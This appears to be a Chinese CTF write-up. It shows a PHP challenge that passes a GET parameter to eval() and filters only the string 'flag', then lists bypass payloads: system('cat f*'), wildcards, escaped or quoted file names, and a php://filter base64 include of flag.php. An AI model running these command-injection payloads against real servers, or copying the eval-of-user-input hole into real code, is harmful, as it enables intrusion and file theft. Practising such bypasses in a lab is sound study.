<?php
error_reporting(0);
if(isset($_GET['c'])){ $c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c); } }
else{
highlight_file(__FILE__);
}
?>
绕过特殊字符的过滤
?c=system('cat f*');//glob1
?c=system('cat f?ag.php');//glob2
?c=system('cat f\lag.php');//转义字符实现绕过
?c=system("cat f''lag.php");
输入payload后右击页面查看源码即可看到flag
?c=include($_GET[1]);&1=php://filter/read=convert.base64-encode/resource=flag.php//直接将题目变成文件包含漏洞
得到base64编码后的源码
需要进行base64解码
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.